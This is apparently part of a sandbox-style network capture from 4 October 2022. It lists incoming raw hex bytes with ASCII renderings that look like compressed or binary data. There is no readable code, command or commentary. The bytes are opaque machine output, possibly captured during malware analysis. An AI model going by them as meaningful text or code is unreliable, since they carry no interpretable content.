                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12451INData Raw: 9a 51 72 61 00 ae 82 51 10 b8 fb 64 36 a5 0a d7 4d e8 bd 32 f0 02 f5 a9 20 42 73 21 37 02 c0 42 30 c3 47 64 c9 12 77 8a de b1 73 db ff 48 00 19 9b 7d 02 cc 14 2f 01 00 00 a2 73 a6 da bf a7 9c 6e 2c c0 15 ee 10 28 a0 1a 4b 1e 2e 40 63 94 f4 d6 ff 1e 29 cf 2b 20 c6 6e 77 d0 df 9d c0 34 d7 1f 2c 46 89 da 5f 48 07 41 2d 60 3f 6f 8f 2e c0 e1 f4 6a 27 60 a3 9a 3d d0 3f 6f 98 43 d4 5f a4 dd 4d d2 bf ff 0a a7 2a 00 94 a7 9c d7 df 86 38 24 2c 20 d5 8e 67 2b e0 d6 86 42 24 c5 31 77 0e 4b 7c 57 25 d1 4f 7a 28 83 a6 65 1e 22 5a c5 82 1f 1b 1b 43 71 25 f0 d7 c2 81 fe 65 61 99 19 8e 54 7f 99 26 5e 82 69 83 46 ca 8f 63 4e 20 53 77 5c 2f e6 a0 94 01 94 31 3b d9 e3 22 b0 75 86 45 55 9a be 0c 9c 36 7d 1e 0d dd b0 8e 13 de 11 31 7e 5e ab a7 6a e6 60 82 b9 6a d9 69 9c a9 26
                                                                                                                                                                                                                                    Data Ascii: QraQd6M2 Bs!7B0GdwsH}/sn,(K.@c)+ nw4,F_HA-`?o.j'`=?oC_M*8$, g+B$1wK|W%Oz(e"ZCq%eaT&^iFcN Sw\/1;"uEU6}1~^j`ji&
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12452INData Raw: 59 38 62 d6 be 2e ab ce ea cd 12 38 3b e9 2e 84 8d 1e 01 7f 6a 5a 50 71 7b 01 00 00 40 1e ff 09 c4 6e 10 69 02 c4 a4 2e 48 fe 3b a8 f2 17 fd 3b 7c 4e 1c 05 c4 e1 b7 9b 05 c4 2a 28 fb 0f c4 92 b4 17 f5 3b ec 7e 31 09 c4 59 97 19 f5 3b 77 3d ce f3 3b 86 bc f7 f2 3b 92 2c c9 f0 3b 58 3a e8 0c c4 bc a6 b7 0f c4 08 8a bc f7 3b 25 53 3b f7 3b 0e e4 5b fd 3b 3e 20 b7 07 c4 78 e6 5f d4 bf 9e ae 9b c5 d7 15 e3 00 36 23 1f f4 29 4b 56 ce 62 88 93 87 11 6a 96 ad 27 d9 75 ef bd 90 53 6c ee 5f da f4 52 18 69 3d 92 89 9b a6 e4 46 3c 6c d1 0f 92 00 1f ed e4 2a 9d 05 87 e3 99 d3 f8 c9 af 33 c4 d1 b4 7a 52 52 70 6c 9b cd 5a 6e 52 7b 7d 45 17 42 34 c7 5c 16 a0 4e 70 62 e0 96 39 ee b9 63 59 18 d7 bf f9 7b b2 c4 bf 0a 84 04 88 83 c7 9d 1e f7 30 d8 17 a0 0e 00 84 d1 e6 eb cc
                                                                                                                                                                                                                                    Data Ascii: Y8b.8;.jZPq{@ni.H;;|N*(;~1Y;w=;;,;X:;%S;;[;> x_6#)KVbj'uSl_Ri=F<l*3zRRplZnR{}EB4\Npb9cY{0
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12453INData Raw: 24 51 7d fd 72 23 4d 73 c0 39 fd ff 30 4d 5b 6b 96 82 3b f1 75 1b aa 67 8c 88 1b 77 1e 0b 17 5c 4e 5e 58 15 5c d0 71 9f d2 d4 1f c1 6b c1 52 11 81 dd 02 79 ce bd 88 df ae cc 85 92 d8 b2 4a 10 d9 06 00 e0 fb 2f e2 d0 d9 e6 d1 6e 32 87 d8 d0 bf 43 29 0b ab b2 1d 26 58 90 4e 20 35 71 95 c4 02 f4 17 e6 7c 5c 84 2e a7 b7 7a a9 a0 95 75 f3 3e e1 ae 2a 98 9e bf 08 bd 1e 2b 48 9f 92 bf b5 f9 49 21 3b 10 21 fa 09 ef b5 27 2b c2 a0 3b a8 e0 de 99 3d 71 05 14 bb fc 17 36 e4 e5 8c 2e 3f df c3 a1 a0 fd 65 4a 36 e1 be 72 21 96 bf 50 5d a7 23 48 7f 2c 8f 35 7b 88 f1 d8 24 a7 26 db 9b e4 b6 fa a6 66 e4 6a 4b 21 f9 a3 7a b3 72 fb a3 dc cc b5 3c 2b 83 ec 41 2f ad bd e4 f7 ec 86 0b e0 a2 31 51 90 70 b8 36 4d 3f 25 f3 e8 ff f5 b0 91 7e 96 9f 16 3b 60 1b c7 62 46 9d 1b d2 c3
                                                                                                                                                                                                                                    Data Ascii: $Q}r#Ms90M[k;ugw\N^X\qkRyJ/n2C)&XN 5q|\.zu>*+HI!;!'+;=q6.?eJ6r!P]#H,5{$&fjK!zr<+A/1Qp6M?%~;`bF
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12455INData Raw: 53 c2 d7 95 79 f0 39 a9 27 cd 04 ce ff 00 00 00 e0 c2 0c 98 80 f0 cb 8f c9 ff fa 0d d3 c0 a7 db f6 a9 d6 46 84 0f 89 fe 74 f4 02 88 5f 7a 16 cf ff 1f e9 82 c1 27 26 fd 3b 00 82 dd 35 55 a1 1e a1 ab f4 ec 1d 35 00 00 00 00 60 6a 5f 41 fb 58 61 c5 c5 ff 3f d0 a6 8d 14 b0 26 4f 08 65 0a 66 ee 46 5c 44 8d fe b5 66 df 91 95 ec 78 37 00 47 4d 10 ce ff 60 bd 20 26 9c 14 06 1d df 3b 78 3f 00 00 00 00 e0 88 37 2f 39 3a 01 31 3b 00 fe ea 93 a3 a9 c8 66 c6 ff d9 f9 89 b4 8e 38 7d 3b f5 ce c6 3b 00 00 00 00 e0 d8 0a 5d eb 6a 51 87 c6 ff 0a 86 a0 d9 65 d2 38 c1 ff 6f 4e 15 19 da 3e 86 71 d8 68 ff 3e 00 ff ff ff df 12 de c9 bf a0 99 5c c9 ff f3 e9 a5 b9 4e 62 f1 fd dc 03 20 48 21 00 90 f0 ca 09 f1 fd 86 5e 38 20 fd c5 ff ff ff ff df f2 1d 0c 9b 40 79 12 c1 ff 17 ef 0e
                                                                                                                                                                                                                                    Data Ascii: Sy9'Ft_z'&;5U5`j_AXa?&OefF\Dfx7GM` &;x?7/9:1;f8};;]jQe8oN>qh>\Nb H!^8 @y
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12456INData Raw: 1f 99 2a d8 87 e3 66 51 94 ea 18 99 d5 6b 32 10 99 61 78 21 e8 66 21 8b 12 ef 66 89 a0 d2 eb 66 80 df 0d 1a 99 46 c9 00 15 99 a9 6d 80 ef 66 0f 8b 4d 40 4a b2 6b d0 3f 8a f3 f9 6b 35 31 28 d9 92 ac a0 09 e4 bb f2 79 4f f4 c7 9e 32 ca f1 87 59 89 31 02 30 79 a2 7f 10 ea c4 cb 08 ed 43 dd cb 0d 06 85 0c af 0c 03 f4 5a 66 d5 e0 23 ba 70 82 f5 49 00 4e e6 ff 30 7e 52 f9 1b 21 58 8b bf 0b dd c4 c0 3a 0e 0d 53 7b c1 fd 62 3b 50 8f ef 58 16 39 f8 12 41 5f 39 fd f9 37 5e 5d fc fc 4e 77 2a ec ec 46 2a 9b dd b7 fc cd ff 66 84 76 31 03 99 17 12 5c f8 66 8b 15 84 f0 66 5f 46 97 08 99 57 fd a4 0f 99 4f 46 64 0b 99 2e f1 bb fa 66 19 77 b6 f5 66 47 49 ce f5 66 1b 42 00 1b 99 6b a0 82 11 99 98 6a 7e ed 66 fb 1e 13 16 99 97 29 cb 1e 99 93 aa d8 e6 66 eb 61 eb e1 66 6b 42
                                                                                                                                                                                                                                    Data Ascii: *fQk2ax!f!ffFmfM@Jk?k51(yO2Y10yCZf#pIN0~R!X:S{b;PX9A_97^]Nw*F*fv1\ff_FWOFd.fwfGIfBkj~f)fafkB
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12457INData Raw: 02 80 ef 92 00 3b c9 28 b1 2b f8 77 d2 6a a9 bc 9f f4 7f 11 22 6f f0 4a a3 41 03 e0 0b 8a 75 71 38 4e f2 80 41 78 a6 92 3d 56 90 3e 40 96 d1 fa b3 e4 d0 01 00 00 8c 28 84 2f 40 56 01 1e 29 40 59 f0 0e 22 0d 53 3a c0 6d 40 4e 60 d3 fe ff ff ff 4e 18 29 60 6b e2 ae d6 98 f3 cb d3 3f 6f 29 f5 19 09 bd 2d a0 0d ef cf 67 d3 01 00 00 00 8f 02 2e 80 1d e3 8a 11 09 1e 60 d2 1e 08 82 29 8c 4c 93 9d 1a 91 7c 92 39 4e 00 79 23 ed 21 e3 24 e0 a0 f9 fe 50 a1 cf 61 b8 50 77 1e 4a cb 13 ba 29 60 50 a3 01 f4 ad 1e ce 5a 2b 88 fc 01 3d 3c 6a 1b 13 21 60 6f a2 92 c9 97 3c c9 c7 76 0a 15 dc 5f 97 91 75 2a 8d cc 3b d3 3f fb 64 dc dc b2 cc 46 4f 4e d7 6f 9a 2c 01 00 00 90 b1 81 74 22 b4 14 0d cd 42 2f b7 2d 80 c9 14 af 21 78 89 d3 ad 39 22 9f d9 7f ec 39 0c e8 f6 84 2c 2c 60
                                                                                                                                                                                                                                    Data Ascii: ;(+wj"oJAuq8NAx=V>@(/@V)@Y"S:m@N`N)`k?o)-g.`)L|9Ny#!$PaPwJ)`PZ+=<j!`o<v_u*;?dFONo,t"B/-!x9"9,,`
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12459INData Raw: 5f 40 ce db 2f 69 07 24 23 33 84 9f 98 df 9a 95 8f 91 8a 84 01 00 00 30 c5 ca f5 3b 1b 5d 92 f5 3b e5 07 b4 09 c4 20 46 9c f5 3b 86 b4 4b f3 3b 0f b5 72 f2 3b bb 3d 4c f0 3b a9 bb 6d 0c c4 3d 67 32 0f c4 09 6b 39 f7 3b c4 ba be f7 3b 07 95 de fd 3b 4f 79 32 07 c4 21 bb 14 fb 3b bc 4a 3c 07 c4 aa a8 eb 01 c4 73 59 d2 00 c4 17 31 ec 02 c4 a5 17 cd fe 3b 91 61 77 d8 bf c7 57 e4 68 b1 d3 e2 58 d1 1a cf de 2b ed b9 57 43 31 87 9e 4c 0d cc c9 7a 46 1a e5 b4 0f bf 8c 44 6c 76 20 84 5a 52 16 40 9b 23 42 89 02 82 22 a0 8b 05 bc d4 96 cc 6b 67 57 59 1d 8f d2 a0 2e 46 83 ee d3 12 75 6b 73 c9 78 22 38 3d 34 36 8e fa 2a 1d 4b b3 83 bc bc 93 ca 44 b4 a2 ad 72 9c ab db bd d5 3a 53 30 84 ce 79 1c 65 6a fa dd 76 7b 01 00 00 30 5e e0 3c 8f cb 95 98 54 97 44 61 d2 bf 76 1c
                                                                                                                                                                                                                                    Data Ascii: _@/i$#30;]; F;K;r;=L;m=g2k9;;;Oy2!;J<sY1;awWhX+WC1LzFDlv ZR@#B"kgWY.Fuksx"8=46*KDr:S0yejv{0^<TDav
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12460INData Raw: 66 7d d7 ba ef 66 ad a4 7a eb 66 cc 13 a5 1a 99 92 3d a8 15 99 2d 23 d0 15 99 29 50 1e fb 66 09 a2 9c f1 66 4b 58 60 0d 99 19 dc 0d f6 66 45 ec a1 f2 66 8f aa d0 bf ed af 64 f8 e8 bd 75 c0 b7 75 9e 0f 99 20 22 95 db 17 96 61 fb 7b 26 de c5 02 c9 51 6f 24 fe ed e3 68 d4 13 99 b4 7c e0 8e d1 7b bd fc 3e b6 37 36 97 f8 f8 46 0a 81 16 f8 e6 1f b5 2d 3b e5 d6 7c 05 99 c6 64 1c 1b eb 42 2f f9 66 61 45 ea 19 2e 94 22 c0 92 7e 9c c6 1e 51 67 f3 66 fd b9 34 86 c3 ac e4 6e 24 64 ad 49 49 20 c1 8c 02 44 3b 35 45 da b9 1d 94 c0 f8 ac 81 d3 ee 46 d2 c5 5b 00 99 a7 50 22 40 15 50 1f 0d 37 88 90 93 13 5c fe 0a 09 b9 7f f1 66 9e 60 0e 01 5f e9 b0 d8 2d 5c 86 eb 2e 31 fd c2 43 fb 66 a0 48 d9 bf 12 50 1f 0d cf d7 9d ed 1c b8 c7 04 94 db 2c f9 66 8b 87 db 5a b7 45 a7 fb 66
                                                                                                                                                                                                                                    Data Ascii: f}fzf=-#)PffKX`fEfduu "a{&Qo$h|{>76F-;|dB/faE."~Qgf4n$dII D;5EF[P"@P7\f`_-\.1CfHP,fZEf
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12461INData Raw: fe 12 fd f3 3a fb f9 4b c2 5e fa fc ba 14 97 23 1f ad 34 81 74 0a bf a6 bf 10 00 56 18 a3 0f e4 87 fe 7a 49 f4 7b 62 31 cc f1 5b c5 8a 37 02 e4 bd a1 79 10 5e 10 c8 0e ed 2f c6 96 87 e4 00 00 00 00 f8 a9 29 00 00 00 00 00 00 00 00 00 74 c3 29 00 00 b0 4b 00 08 aa 29 00 00 00 00 00 00 00 00 00 e2 49 30 00 10 b0 4b 00 18 aa 29 00 00 00 00 00 00 00 00 00 b0 25 2b 00 20 b0 4b 00 28 aa 29 00 00 00 00 00 00 00 00 00 d2 9c 2f 00 30 b0 4b 00 38 aa 29 00 00 00 00 00 00 00 00 00 e2 63 4b 00 40 b0 4b 00 48 aa 29 00 00 00 00 00 00 00 00 00 74 c3 29 00 50 b0 4b 00 b0 aa 29 00 00 00 00 00 00 00 00 00 fc 7c 37 00 b8 b0 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa 9d 29 00 00 00 00 00 00 00 00 00 00 00 00 00 70 26 2c 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: :K^#4tVzI{b1[7y^/)t)K)I0K)%+ K()/0K8)cK@KH)t)PK)|7K)p&,
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12463INData Raw: 7a 93 c4 3d bc 77 ec 18 2b a7 de 57 57 6c 67 d9 97 bd c3 5d db fa 46 7b 80 2f 5d 4f 1a 4e 0e 4d 25 c3 d7 17 28 60 2e f8 ac 25 8e db 9f 48 0e d9 c2 01 13 93 31 f1 3e 4c 3b 9b 25 5b e5 2d fd 0a 7f 1e da ff 4b 38 50 0f ad 32 ac 6e 83 17 71 98 4e ff a6 20 2f 00 ff ff ff ff 01 5f 22 f0 4c e0 bc db 8f d2 e9 3a f1 b9 7e 60 d4 72 ff 25 a2 2a c0 fc ff ff ff ec 8c e8 4d ae 84 96 5b fa 69 7b b9 98 64 c9 0e 0f 47 8e 1d 33 68 5c fd 67 dc 88 5e 62 01 79 34 6b 48 9c b6 01 4e 15 63 b0 1c bf b1 73 1d 88 2e a4 26 76 fc 9a ac 0c 77 25 fd 17 14 80 c6 a6 05 12 3f e9 65 9b 33 ca 5f ba 71 b8 17 38 a1 02 52 a8 d8 a3 9d 72 55 64 96 b7 80 ea 51 b3 ea 9e a1 26 24 83 24 ee ed 3a 35 ab c2 02 99 19 20 d1 fa 66 99 33 e2 fd 66 19 70 22 f9 66 08 37 fd 08 99 26 a9 f0 07 99 d9 d7 88 07 99
                                                                                                                                                                                                                                    Data Ascii: z=w+WWlg]F{/]ONM%(`.%H1>L;%[-K8P2nqN /_"L:~`r%*M[i{dG3h\g^by4kHNcs.&vw%?e3_q8RrUdQ&$$:5 f3fp"f7&
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12464INData Raw: 67 48 fa 4f 1b 42 15 13 61 06 b3 b1 93 3c 92 22 a4 61 ef e6 96 ac e3 46 3f f1 17 73 39 dc aa 05 ab 86 f3 69 9b 63 bb 45 b6 71 20 ae 22 ad 02 44 01 c2 af 9d a3 e4 7e 9a b7 77 83 4b bf ea 56 85 56 4e 4e 0f f6 3f 45 4b c6 88 05 e0 35 2a ff f1 47 da bb 6e f0 7f 45 72 a8 0f e8 3f 3c ad f7 97 ed b2 ed 0d f8 d2 13 9d 07 60 7e 24 4f 15 38 4e 52 54 ec 8f 60 0d 70 e8 cf 31 a8 35 14 e8 9c 1e 7d 11 c0 1b 34 08 e5 47 c4 85 99 e4 7f 7b fc 5f 1b e8 b1 62 5a e3 97 b3 44 1a 19 f8 24 ad 6a 13 60 c0 d2 b8 01 38 b8 bc a3 f8 8f 8e b6 4c 2b 00 0d 50 5e 50 c9 a6 75 75 c0 fc ff ff ff b6 e6 23 bd 4d 1e 29 71 9f c0 d0 6f 9a 80 fd c1 41 a7 63 23 28 40 19 22 2f 06 83 f7 b3 f1 f3 17 11 84 12 a8 05 b6 1b 3d 6b 9b c1 66 8b b4 71 a3 d3 ec af 02 be 64 0c ad 9d 0f e9 b0 98 b7 94 1e 85 bd
                                                                                                                                                                                                                                    Data Ascii: gHOBa<"aF?s9icEq "D~wKVVNN?EK5*GnEr?<`~$O8NRT`p15}4G{_bZD$j`8L+P^Puu#M)qoAc#(@"/=kfqd
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12465INData Raw: e7 b9 7e 18 d9 ae 70 af 73 fb 76 38 c2 5a 45 ee 89 17 d9 6e ba e4 ec 26 4d f4 ca 70 f4 99 f0 81 f5 f1 f1 5f 3a 0e 02 de 47 11 40 10 44 4a 78 37 ed fd a3 78 32 06 63 da 1c 33 03 82 ec d5 ea e0 6d a4 c3 bd f5 7f 66 fd d9 ff 26 48 e1 c6 1b ff b6 38 80 0b 33 2a 73 05 0e 33 ed c8 fe fd bc a5 e3 b0 ef ae b0 8a c7 12 cf a1 8a c2 f9 29 80 ee c3 fc 20 9e 27 1a 1f 97 ee 10 ec 0a be 38 93 1b 13 f6 8f f6 66 a7 39 57 fe 66 83 ba 44 06 99 f3 79 77 01 99 92 7a b7 05 99 22 1d 68 f4 66 1c b3 65 fb 66 d3 3d 1d fb 66 0f 56 d3 15 99 4f e4 51 1f 99 c4 56 ad e3 66 5f 9a c0 18 99 e3 7d 18 10 99 17 ce 0b e8 66 47 cd 38 ef 66 2f c6 f8 eb 66 d6 e9 27 1a 99 58 d7 2a 15 99 ef 48 93 e7 66 2a 98 45 40 4a ba 9c a2 fb 37 a3 ef 92 85 68 30 d9 c2 db 46 09 00 93 ed 5a 16 e4 f2 8b 83 50 f4
                                                                                                                                                                                                                                    Data Ascii: ~psv8ZEn&Mp_:G@DJx7x2c3mf&H83*s3) '8f9WfDywz"hfef=fVOQVf_}fG8f/f'X*Hf*E@J7h0FZP
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12467INData Raw: e6 66 95 3a ae e9 66 a2 ac d6 e9 66 d6 9e 53 14 99 fc 58 b6 bf 4a bb 9a f6 9f 23 b3 5c f5 5f 16 c9 26 93 fa 38 55 f4 7f 66 73 d0 f1 47 e9 c8 2b 02 a0 a9 e3 65 10 92 4c 8a 12 ed 9b 85 8a 17 06 5d d4 ee 16 03 5c d2 27 cf e0 6b f2 31 98 f5 81 c8 0f fc ff 60 5e 13 e3 1b 51 28 ca a5 0b 2d 34 81 20 0e 45 cb 3a db fd 52 3b 11 95 ef f0 ee 78 e2 12 49 17 78 e7 f9 77 0e 1c e6 fc 66 e8 d5 3f 1f a9 20 42 a5 00 43 51 fb 86 36 3a 50 ec 2d 85 05 ea a5 ed 69 1d c8 8c d2 6b e5 64 03 52 1a d6 f2 36 ed 3d 3d ca 89 d2 0c 9c fa cd d2 08 64 69 bf ed 25 9a 8f 82 52 09 0c e3 0e 92 c5 cc d0 bc ad 93 96 dc 05 d2 68 09 66 4c 12 d4 c9 44 65 2d df 01 e8 ea ad 3e 52 7e df 12 f9 99 46 60 2d a9 b8 76 24 2d 3c 72 62 d7 92 65 9b d6 bf d3 b1 d4 67 75 58 ab ea fd fb 5d d5 12 2b d3 9c 08 23
                                                                                                                                                                                                                                    Data Ascii: f:ffSXJ#\_&8UfsG+eL]\'k1`^Q(-4 E:R;xIxwf? BCQ6:P-ikdR6==di%RhfLDe->R~F`-v$-<rbeguX]+#
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12468INData Raw: 0f c0 c4 73 76 fb 47 83 6a e7 fa 7f 94 53 21 05 e8 1e 69 ea 97 e7 04 78 0b 61 ff 12 4a 74 c0 fc ff ff ff 4c 5e 78 01 2f 69 e2 6f 48 cb fe d7 4a 15 8a d8 ca bb b1 55 c5 5e 2a a4 98 16 2a 9e ac 1c 27 f3 f9 17 9c e8 10 a2 05 dd 2f 3f 61 9b ca 12 89 be 71 ef bf ee a5 02 ad 48 0e a7 9d ad f5 b2 92 b7 36 82 87 b7 ea 68 44 9a 46 4e d7 f9 0e d7 5b 62 b2 7a 63 53 c8 b3 a3 04 e8 b1 a4 40 5f fa f1 bf 4a ff b2 39 8c 12 d0 ce 29 04 17 f8 49 c0 74 1d 60 ad 2f a6 0f 38 45 c9 bd f6 8f fb 5e 99 f2 cf 62 13 dc 0e e8 27 c5 94 0b c0 c0 47 e1 ff 47 b7 9e 70 fe 7f 60 c7 b6 01 e8 8a a1 b3 f9 97 70 07 f3 03 f8 67 a6 83 09 60 cb 89 51 1b 38 e3 df 4a e2 8f ed 88 6e e6 cf b4 3d 2b 1a e8 09 93 63 1f c0 96 49 16 eb 47 b9 63 da 7a a9 37 92 b1 4d ff e4 14 5c c0 fc ff ff ff 1e a1 41 31
                                                                                                                                                                                                                                    Data Ascii: svGjS!ixaJtL^x/ioHJU^**'/?aqH6hDFN[bzcS@_J9)It`/8E^b'GGp`pg`Q8Jn=+cIGcz7M\A1
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12469INData Raw: 40 a9 a0 be 9e 79 ff 8b 50 27 c0 fc ff ff ff 99 aa 40 14 3b d4 cc af 02 78 a3 2c ad 9d b8 9e 90 98 b7 13 59 a5 bd ea bc af b8 4c 4e 14 1a 2c dd 5b 4f a1 58 69 53 cc e8 81 0e e8 1a cf 62 55 fa 43 d0 4d 96 64 aa 8d fb 49 8e 20 30 9c 52 fd ea ef 7c 50 62 95 32 c0 65 48 b8 ad f5 40 15 f1 83 e8 b1 b1 fe ae 7c 20 a4 f3 7d 08 94 ac 29 79 1a 3c 29 0f 85 0e 39 03 00 41 80 7c 08 08 6f 0f 85 02 39 03 00 41 80 7c 08 09 78 e9 f1 38 03 00 ea c7 9d 55 33 81 aa 98 31 00 34 48 2e b0 98 6b ee 59 9a bc 69 37 3a 7d db 30 76 bc 8e 8e 7b ba 3d 7e f5 8e 0c 66 e6 2b 0f 12 66 d9 0a 19 04 7c b9 31 1c 0e b1 df 01 f4 31 d0 19 e2 47 6c 6b ce a6 9a 8e dd 4f 56 cd 28 aa 65 94 ef f1 c9 82 3d 9e b0 4f 71 c0 5d 7c ce 81 5c 08 ca 95 19 8d b1 da 97 49 fc c5 2f 50 01 14 90 a0 49 9e c5 68 b4
                                                                                                                                                                                                                                    Data Ascii: @yP'@;x,YLN,[OXiSbUCMdI 0R|Pb2eH@| })y<)9A|o9A|x8U314H.kYi7:}0v{=~f+f|11GlkOV(e=Oq]|\I/PIh
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12471INData Raw: 96 41 1e 54 52 79 e4 5e a7 bd 89 e6 d4 ae 3f a7 4a 1c a0 36 5b 06 9a 73 f9 34 b0 a7 6b b3 33 25 a9 e5 8b 5c aa 26 56 6a 84 9e 6d 72 04 eb 57 91 71 cf 21 a8 e5 c4 63 6c be 7e 24 39 83 1b 87 3c cc 0f 00 af df 48 e6 fd e0 36 26 68 fe ff ff 5f d1 a2 de bf a7 de 53 25 40 8e f3 d3 d9 bf ee de ea da bf cd 0f dc d6 bf e9 f4 39 2d 40 cc 2d 48 dd bf 0d c2 19 2f 40 8b fa c8 21 40 6f 1b ef 29 40 b1 8e 47 ca bf 47 f5 6d de bf 33 82 96 2d 40 12 cf 16 d1 bf 52 02 2f d2 bf 71 a3 19 de bf 85 78 fc 25 40 00 49 8d d5 bf 49 16 dc 27 40 df 32 5f 40 40 dd be 83 43 cf 74 a6 64 f5 af a2 af 98 b9 78 51 60 f7 0f c5 89 2a f0 9a a3 5f 12 9f 15 e5 44 f3 47 21 e6 e8 9d 28 e8 0b eb 56 e2 17 87 76 fa af 01 c4 ee a0 40 a4 4d 85 4f b0 a6 47 1c cd 9e 0a df c2 c4 62 46 11 49 0b 0d f0 ed 81
                                                                                                                                                                                                                                    Data Ascii: ATRy^?J6[s4k3%\&VjmrWq!cl~$9<H6&h_S%@9-@-H/@!@o)@GGm3-@R/qx%@II'@2_@@CtdxQ`*_DG!(Vv@MOGbFI
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12472INData Raw: b8 17 a0 34 a4 9a c5 c1 5f 2c e0 ff 09 cb 2c d7 21 ef c3 1c 21 d9 45 a3 a2 6e 74 ce 65 b9 32 c0 e1 f9 90 00 00 00 12 d0 19 3f 00 a6 93 0b 37 20 42 e9 75 38 0d f7 78 d9 91 1b 3e 88 6c ff ff ff ff 78 48 c3 7f a3 dd f0 81 ce 86 47 3d e0 88 ca 98 0e c9 74 f6 9f 92 26 8f 84 6c 00 00 00 00 e8 86 40 e1 e9 e2 3a c8 1f 6d 1d 63 b7 3c 40 9a 71 fb 3a 40 e5 d4 c0 c7 9f 67 5b 88 01 49 79 d0 c3 1f ce fd a7 cf a0 ef 3e 42 e7 f9 b3 72 6f f3 a2 39 51 3b 80 e5 8c 06 dd 8f c3 bb 5c cb d5 42 0a c2 ac 54 81 24 4e 6a 90 a2 db cb ad 1b df c4 5f 45 3d 96 c7 b2 15 25 17 ed ed e5 83 6c 00 00 00 a0 c5 d9 48 ba c3 c2 99 a3 40 d4 1a 2f c1 1f 66 8a 74 33 51 bc 04 b9 38 e0 e4 92 82 54 36 e4 dd 13 ce df 38 fb c9 a3 00 cd ed c0 39 c0 d0 0b a0 0a e6 0d db e7 de 9f 7b 77 b0 81 94 5e f1 2a
                                                                                                                                                                                                                                    Data Ascii: 4_,,!!Ente2?7 Bu8x>lxHG=t&l@:mc<@q:@g[Iy>Bro9Q;\BT$Nj_E=%lH@/ft3Q8T689{w^*
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12473INData Raw: 22 69 38 bd c8 b6 db 4d 90 5c 89 b2 2b 20 c7 1e e1 81 37 0f 17 86 4f e5 f1 e5 79 3b 1b a5 31 d9 9f cd bd 1c ba 01 43 13 e8 d0 01 00 00 32 a1 52 26 60 43 2f 05 24 c0 99 94 e0 2d 60 f1 d2 b7 da 3f 35 f8 c9 de 5f da a5 c7 d8 bf 0b c2 2d 20 00 92 b7 16 dd df 58 f0 ae 26 20 0f 6e ed 21 e0 22 68 50 2c a0 2e 49 98 db 9f e3 89 56 d8 3f b9 8a b3 d1 9f 77 6c e4 26 c0 99 6e 9a 22 a0 46 3b 94 24 40 13 e4 7e dc ff 32 29 45 21 20 de e1 e0 11 64 70 14 83 b4 d4 6c 4f 7b 45 24 ed 14 dc ac 0d 39 ca e9 5f 74 84 e8 ac 3a 84 2e ad 8b 4a 0b 56 8d 2e 58 a8 54 3f 75 0d 68 f3 74 51 26 40 3c a7 60 8d c6 ac 76 83 a3 4a 6a 82 97 dc f4 ac 81 b8 9e 57 bf be 8a 6c 74 4c bc 8f 99 77 84 9e f2 fc 87 2e f3 f5 8c 08 56 e3 68 9e ab 54 59 a3 cb 6b f3 a2 c7 e0 43 3c c1 4e 4b c5 ac 58 6d 65 49
                                                                                                                                                                                                                                    Data Ascii: "i8M\+ 7Oy;1C2R&`C/$-`?5_- X& n!"hP,.IV?wl&n"F;$@~2)E! dplO{E$9_t:.JV.XT?uhtQ&@<`vJjWltLw.VhTYkC<NKXmeI
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12475INData Raw: 2c 7d 6c 23 bb 61 77 dc 0b d9 89 16 8a 7e 02 be f0 09 d9 86 d8 80 2c ed af f1 80 29 06 b1 08 e4 28 03 e8 56 2d f1 e0 e7 6e 5b 1b f0 4e d3 b3 5c 48 87 12 f2 04 d9 71 f9 a6 00 cb 29 4d ec dc 62 c8 dd 6e 47 03 31 40 bf 01 1f 2e a4 76 3f c6 68 b4 0a 53 8d ed b1 da 04 36 16 42 75 2c 1d 58 50 b7 a9 74 2f ad 96 f8 74 2a 46 50 b9 10 2b 43 e1 8f d9 f2 a0 66 ff cf a5 b5 14 4d f1 c1 bf 8d e3 ed de 5b 6c 15 34 98 4b 80 99 7f 1d 4e 58 f6 c4 e6 bd df 96 ef a8 af f5 1b e6 73 40 4f 9e ed 3a 8e 30 b2 02 99 72 6b a1 fa 66 6a e0 92 fd 66 fa f3 52 f9 66 ab 94 8d 08 99 1d b2 80 07 99 5b b4 f8 07 99 de 67 36 e9 66 56 fd b4 e3 66 7d af 48 1f 99 4e 4b 25 e4 66 da 44 fd ec 66 fe c7 ee 14 99 fe 54 dd 13 99 46 4f 1d 17 99 6f 30 c2 e6 66 61 ee cf e9 66 c6 a8 b7 e9 66 82 c2 bf 13 99
                                                                                                                                                                                                                                    Data Ascii: ,}l#aw~,)(V-n[N\Hq)MbnG1@.v?hS6Bu,XPt/t*FP+CfM[l4KNXs@O:0rkfjfRf[g6fVf}HNK%fDfTFOo0faff
